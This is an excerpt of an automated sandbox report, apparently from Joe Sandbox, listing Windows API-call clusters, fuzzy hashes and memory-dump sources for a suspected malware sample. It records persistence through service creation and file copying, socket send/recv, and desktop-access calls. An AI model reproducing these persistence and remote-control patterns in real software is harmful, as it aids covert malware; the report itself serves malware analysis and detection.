                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual_ftol
                                                                    • String ID:
                                                                    • API String ID: 2737540598-0
                                                                    • Opcode ID: 0c717a01402f860ddbd81e72d06cec5ddd3fc0d17aec082e18a5cc91da5760e6
                                                                    • Instruction ID: 75165211b362c1627f18bd49e2c8b26c5740ac8c1daa3f9b9590968628634e41
                                                                    • Opcode Fuzzy Hash: 0c717a01402f860ddbd81e72d06cec5ddd3fc0d17aec082e18a5cc91da5760e6
                                                                    • Instruction Fuzzy Hash: AC11C171700704ABF314DB65CC86F9A7AE8EF407D1F10852AFA16C6288DAB4E8008750
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,75920F00,00000000,00000000,00000000,00000000), ref: 1000A06C
                                                                    • _beginthreadex.MSVCRT ref: 1000A08A
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000A09A
                                                                    • CloseHandle.KERNEL32(?), ref: 1000A0A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 92035984-0
                                                                    • Opcode ID: 09712f8e9e0bcee6d11d94bb5f8c246c340870b3993e72e7c9fda73f257e5f06
                                                                    • Instruction ID: 15c26be9302d7139859681cd7532fc677a9d9e28b366fa9b608ad3a6ccdbccd6
                                                                    • Opcode Fuzzy Hash: 09712f8e9e0bcee6d11d94bb5f8c246c340870b3993e72e7c9fda73f257e5f06
                                                                    • Instruction Fuzzy Hash: EFF0A4B290022DBFEF01DFA8CD45CEE7BB9EB09251B004565FD21E2265E7318A209B90
                                                                    APIs
                                                                    • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10001B7F
                                                                    • memset.MSVCRT ref: 10001B97
                                                                    • recv.WS2_32(?,?,00019000,00000000), ref: 10001BAE
                                                                      • Part of subcall function 10001C0D: __EH_prolog.LIBCMT ref: 10001C12
                                                                      • Part of subcall function 10001C0D: memcmp.MSVCRT(?,?,00000006,00000000,00000000,00019000), ref: 10001C3F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prologmemcmpmemsetrecvselect
                                                                    • String ID:
                                                                    • API String ID: 845096623-0
                                                                    • Opcode ID: 9de728bd16ee88078f1147b8d96536cc58b4422340208934578f64e372f65737
                                                                    • Instruction ID: afa39f8f22a2e65889c4d3b7fb3bc88bafb1cfa927511703f4baee0bbc662a7f
                                                                    • Opcode Fuzzy Hash: 9de728bd16ee88078f1147b8d96536cc58b4422340208934578f64e372f65737
                                                                    • Instruction Fuzzy Hash: 3321A576500128ABEB10CB58DC84ECF7BACEF453E0F000555F91997195E771EEC5CAA0
                                                                    APIs
                                                                    • send.WS2_32(?,00000000,00000006,00000000), ref: 10001FC6
                                                                    • Sleep.KERNEL32(0000000A,?,10001F82,00000000,00000000,00000000,00019000,?,00000006,?), ref: 10001FE3
                                                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 10002003
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: send$Sleep
                                                                    • String ID:
                                                                    • API String ID: 3329562092-0
                                                                    • Opcode ID: 77ba07aa8f325cd2edcfd63baab4ab120039e9619fbfab7e8c15a43e49c5f85f
                                                                    • Instruction ID: 7c7494472e437d7760c5a295741750c72d939f712f423e24f447c23a6713e152
                                                                    • Opcode Fuzzy Hash: 77ba07aa8f325cd2edcfd63baab4ab120039e9619fbfab7e8c15a43e49c5f85f
                                                                    • Instruction Fuzzy Hash: E4214D7290031AEFEB00CF95CC85ADD7BA4FB043A5F20812AFA1596056D7B0AE91DB90
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 10009FF4
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 1000A013
                                                                    • SetEvent.KERNEL32(?), ref: 1000A01E
                                                                      • Part of subcall function 1000A1AC: LoadLibraryA.KERNEL32(user32.dll,?,?,00000000,?,00000000,Function_0000AF24,1000D460,000000FF,?,1000A02F,00000000), ref: 1000A1D4
                                                                      • Part of subcall function 1000A1AC: GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 1000A1E9
                                                                      • Part of subcall function 1000A1AC: GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 1000A1F5
                                                                      • Part of subcall function 1000A1AC: GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 1000A201
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$EventH_prologLibraryLoadmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1665906595-0
                                                                    • Opcode ID: 4924b9432ba05327cefe2ae31b936a73d278707eeb355b2f5176c0674f4179f0
                                                                    • Instruction ID: bf1320978b60b16f40b87c5a594d34147c3bdbcbe467daf5d5d66b68f1dcd34b
                                                                    • Opcode Fuzzy Hash: 4924b9432ba05327cefe2ae31b936a73d278707eeb355b2f5176c0674f4179f0
                                                                    • Instruction Fuzzy Hash: 1CF06DB6D0120DAFEF00EFA8C945ADEBFF8EF0A290F10012AE401B2215D7355E40DAA1
                                                                    APIs
                                                                      • Part of subcall function 1000A053: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,75920F00,00000000,00000000,00000000,00000000), ref: 1000A06C
                                                                      • Part of subcall function 1000A053: _beginthreadex.MSVCRT ref: 1000A08A
                                                                      • Part of subcall function 1000A053: WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000A09A
                                                                      • Part of subcall function 1000A053: CloseHandle.KERNEL32(?), ref: 1000A0A3
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,75A78400,100098BA), ref: 10008EAD
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,75A78400,100098BA), ref: 10008EB4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleObjectSingleWait$CreateEvent_beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 1089044457-0
                                                                    • Opcode ID: ae333e3efa1cf9964cf5906c6c1fafbad2d9c37fdd142fb7b8b31cbaaaf885bc
                                                                    • Instruction ID: d6efba61a8d1c30af2bcfb7405c55962e4b0b5b2fefc3c8facbf6a0ab16d7444
                                                                    • Opcode Fuzzy Hash: ae333e3efa1cf9964cf5906c6c1fafbad2d9c37fdd142fb7b8b31cbaaaf885bc
                                                                    • Instruction Fuzzy Hash: 3DD012F28096347EF61067742C49DFB350CDB032F1B150751FD11D51D9EA140D8146B5
                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,10007D67,?), ref: 1000710F
                                                                    • wsprintfA.USER32 ref: 10007120
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2452939696-0
                                                                    • Opcode ID: 4dbd100e9400942c41e5e1807255a7e2b7a0e37f64c6861b15b4953b4d121d95
                                                                    • Instruction ID: c03d28a1dd34d89bbcc1f663290b6a9b283fe8bb38574ef75e147567b18b88f0
                                                                    • Opcode Fuzzy Hash: 4dbd100e9400942c41e5e1807255a7e2b7a0e37f64c6861b15b4953b4d121d95
                                                                    • Instruction Fuzzy Hash: E6D0127180021CFBCF01EBE4DD49CCD7BB9BB08288B004460FA06E1064D771E565DBD5
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(02506C7E,000000FF,00000007,00000000,00000004,00000000,?,?,?,02506990,00000065,00000000,?,02505F25,FFFFFFE0,00000000), ref: 024BE1BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0c8d8a839ae5cab81025d682d6d5e8e18988fa8771bb9019b0ad9e76903669f1
                                                                    • Instruction ID: 001471c6a5005c000e777e79f9c09bc018a795e78da6206bc5d15fd1011742ee
                                                                    • Opcode Fuzzy Hash: 0c8d8a839ae5cab81025d682d6d5e8e18988fa8771bb9019b0ad9e76903669f1
                                                                    • Instruction Fuzzy Hash: 98B09B719018D5D5DA16E770460875779106BD0711F7AC052D1030655A8738C191F175
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(024D473A,00000000,76FA4F4C), ref: 024BE371
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3311cdc1437dc7d57fc21bf6541892f70bad979a9ac821505f141b48a28c8ae1
                                                                    • Instruction ID: ba355d8e859d6816615315c8d49fa765a9c66f78f412bfb7516d1d93b4bf5fbd
                                                                    • Opcode Fuzzy Hash: 3311cdc1437dc7d57fc21bf6541892f70bad979a9ac821505f141b48a28c8ae1
                                                                    • Instruction Fuzzy Hash: 10900231242841E25945B1588404507400697E02417F6C012A1514954CC9269956E661
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(024FD1D8,?,00000000,00000000,00000000,?,?,00000004,00000030,00000000,?,00100001,?,?,00000005,00000060), ref: 024BE071
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 86276baadd0a6f8d7d7dbe651620013fe57213813097658a0b9f257221dea9ea
                                                                    • Instruction ID: 12c6cba3fdbbdc8eff8bfe0daf956e4397acb8111a748b58c9dd0c2ddeca9ea2
                                                                    • Opcode Fuzzy Hash: 86276baadd0a6f8d7d7dbe651620013fe57213813097658a0b9f257221dea9ea
                                                                    • Instruction Fuzzy Hash: 3E900235211800930505B5584704507004687D53513B6C021F1115554CDA2189616161
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(024DB20F,000000FE,00000005,?,00000004,000000FE,00000000,00000001), ref: 024BE0E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 89dbe6fee2a7d5bde55e6a9cebc87a549e6907b4d2d9fa4ed4478543ed452b88
                                                                    • Instruction ID: fd162d09187195704d1a5487c24e7ee05acbcbafa838542260557f549b872b82
                                                                    • Opcode Fuzzy Hash: 89dbe6fee2a7d5bde55e6a9cebc87a549e6907b4d2d9fa4ed4478543ed452b88
                                                                    • Instruction Fuzzy Hash: 9490023120180492D50071988404706000587D0201FB6C412E062455CDCA5589517571
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(02532162,?,00010007), ref: 024BF8E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: bda0a07a9d1d617d10003eecd002a9b528813f507aae15ff61f6aca5c8a7f0a7
                                                                    • Instruction ID: 17a9d86bda039369e1dc55716b4da23c424b6a74c85100243c277696fa841cd1
                                                                    • Opcode Fuzzy Hash: bda0a07a9d1d617d10003eecd002a9b528813f507aae15ff61f6aca5c8a7f0a7
                                                                    • Instruction Fuzzy Hash: B3900231605C00A2954071588884546400597E0301BB6C011E0524558CCE148A5663A1
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(02506AF2,00000004,00000004,000F0007,C0000001,?,00000004,08000000,00000000,00000065,00000000,00000000,00000058), ref: 024BE101
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: dd1357673929edd627d5002cf9b22b1c21bc2a403287383c9e2e20cba39850d4
                                                                    • Instruction ID: a7c3278bab233e358864312cb0a9fac2fa44294094936769d81f40b09dbb6f4b
                                                                    • Opcode Fuzzy Hash: dd1357673929edd627d5002cf9b22b1c21bc2a403287383c9e2e20cba39850d4
                                                                    • Instruction Fuzzy Hash: AA90027120280093450571588414616400A87E0201BB6C021E1114594DC92589917165
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(025068F4,000000FF,00000000,00000000,0000000C,00001000,00000004,76F8D260,0000001C,0250664D), ref: 024BE191
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 99d95164daa121e4aa1da014ad54696e11d4a89c828f981c5379f8b395cffda3
                                                                    • Instruction ID: f493f41ee4575846753655f81b4abaab26142dd9efb5aad95f225d96354de1fb
                                                                    • Opcode Fuzzy Hash: 99d95164daa121e4aa1da014ad54696e11d4a89c828f981c5379f8b395cffda3
                                                                    • Instruction Fuzzy Hash: 7290023120180892D5807158840464A000587D1301FF6C015A0125658DCE158B5977E1
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(024BBB7A,?,00000000,00000001,00000000,00000000,00000000,?,?,?,?,00000000), ref: 024BE551
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9c108ca8da4b7945a0a9952683abbeebe51abec1548ac5c3ebd004b90cba5b90
                                                                    • Instruction ID: f1fbd36493b9b43dd1b27881c55b4b890ae4995d64617fcdfce7fc223b740b08
                                                                    • Opcode Fuzzy Hash: 9c108ca8da4b7945a0a9952683abbeebe51abec1548ac5c3ebd004b90cba5b90
                                                                    • Instruction Fuzzy Hash: CA900231601800D245407168C8449064005ABE12117B6C121A0A98554DC959896566A5
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(0255589B,?,00100080,00000018,?,00000000,00000000,00000007,00000001,00000020,00000000,00000000,76EA5A68,00000000,?,?), ref: 024BE581
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8ac549f2867562ec1500e0e04f390b73ac4eeec54055744d4b505ee26b047c0a
                                                                    • Instruction ID: 52ea3a1bfe49ca4497603a7c7aeba830978ab11dc6f7cd3ffbc77b97a477a51e
                                                                    • Opcode Fuzzy Hash: 8ac549f2867562ec1500e0e04f390b73ac4eeec54055744d4b505ee26b047c0a
                                                                    • Instruction Fuzzy Hash: 93900231211C00D2D60075688C14B07000587D0303FB6C115A0254558CCD1589616561
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,00000006,00000006,00000000,?,?,10001F51,?,00000006,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001074
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID:
                                                                    • API String ID: 3510742995-0
                                                                    • Opcode ID: 1d74ab25eef09fa5e914f7aba4110aa78311b1aed8e0b9673909ecef9a35eedd
                                                                    • Instruction ID: 3bb2addebcf3b707f2711ef3adc63796bd6daa7f6c2fdc3a60a37f8491615d67
                                                                    • Opcode Fuzzy Hash: 1d74ab25eef09fa5e914f7aba4110aa78311b1aed8e0b9673909ecef9a35eedd
                                                                    • Instruction Fuzzy Hash: 1DE0CD76B0434157D670D53ADC01CCFB695EFD16B07190E1EF1E1C2164DA70D8959161
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bc70f71115ca4e63ebceb1627cd6d81ce0ba7c14177427b63d3444ec175a054c
                                                                    • Instruction ID: d29198a90ec96f4f47b5249912550b2766468690260666e6b6ba3339667be135
                                                                    • Opcode Fuzzy Hash: bc70f71115ca4e63ebceb1627cd6d81ce0ba7c14177427b63d3444ec175a054c
                                                                    • Instruction Fuzzy Hash: C8D06C7704014DBBCF029E85EC05EDA3F2AEB58370F158601BE344A1A1C676D9B1ABA5
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 00410328
                                                                    • lstrlen.KERNEL32(?,00000000), ref: 004103CF
                                                                      • Part of subcall function 004128C6: LoadLibraryA.KERNEL32(100140CC,?,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C,00000000), ref: 004128F3
                                                                      • Part of subcall function 004128C6: FreeLibrary.KERNEL32(00000000,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C), ref: 00412A35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$FreeLoadLocalTimelstrlen
                                                                    • String ID: %$%4d-%.2d-%.2d$C$C$E$M$MarkTime$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 3554365422-3486506000
                                                                    • Opcode ID: 4885db4e35c7ad0de6bf44cf329ec7e10b7e87afdc1050f6bb792091b0ccec24
                                                                    • Instruction ID: 0d3807ad2b1df906bf20e6dd931cde3bed11d0420b81c36ad911f3e7cfcfcc37
                                                                    • Opcode Fuzzy Hash: 4885db4e35c7ad0de6bf44cf329ec7e10b7e87afdc1050f6bb792091b0ccec24
                                                                    • Instruction Fuzzy Hash: F851F821C086CCEDEB12C7E8D8487DEBFB55B26349F0840D9E5847A282C6BE165CC776
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,Rsjshd fzfgkqcm,75A78400,00000000), ref: 10009AB9
                                                                    • ExpandEnvironmentStringsA.KERNEL32(%ProgramFiles%\,?,00000104), ref: 10009ACC
                                                                    • strlen.MSVCRT ref: 10009AD9
                                                                    • strncmp.MSVCRT ref: 10009AED
                                                                    • wsprintfA.USER32 ref: 10009B33
                                                                    • strlen.MSVCRT ref: 10009B40
                                                                    • strlen.MSVCRT ref: 10009B59
                                                                    • strcat.MSVCRT(?,10012A68), ref: 10009B72
                                                                    • strcat.MSVCRT(?,?,?,10012A68), ref: 10009B85
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 10009B9C
                                                                    • memset.MSVCRT ref: 10009BB7
                                                                    • strcpy.MSVCRT(?,?,?,00000000,00000104,?), ref: 10009BCA
                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 10009BE1
                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10009C03
                                                                    • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 10009C3C
                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 10009C49
                                                                    • ChangeServiceConfig2A.ADVAPI32(?,00000001,Rsjshd fzfgkqcm), ref: 10009C6D
                                                                    • ChangeServiceConfig2A.ADVAPI32(?,00000002,00015180), ref: 10009CE8
                                                                    • UnlockServiceDatabase.ADVAPI32(?), ref: 10009CF4
                                                                    • GetLastError.KERNEL32 ref: 10009D02
                                                                    • OpenServiceA.ADVAPI32(?,?,000F01FF), ref: 10009D1D
                                                                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10009D30
                                                                    • StartServiceA.ADVAPI32(?,00000000,00000000), ref: 10009D3E
                                                                    • strcpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services\), ref: 10009D54
                                                                    • strcat.MSVCRT(?,?,?,SYSTEM\CurrentControlSet\Services\), ref: 10009D63
                                                                      • Part of subcall function 10008B5E: strlen.MSVCRT ref: 10008B86
                                                                      • Part of subcall function 10008B5E: _access.MSVCRT ref: 10008BAD
                                                                      • Part of subcall function 10008B5E: CreateDirectoryA.KERNEL32(?,00000000), ref: 10008BC4
                                                                      • Part of subcall function 10008B5E: strlen.MSVCRT ref: 10008BCC
                                                                    • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 10009D7E
                                                                    • lstrlenA.KERNEL32(100097BD), ref: 10009D87
                                                                    • RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,100097BD,00000000), ref: 10009D9E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
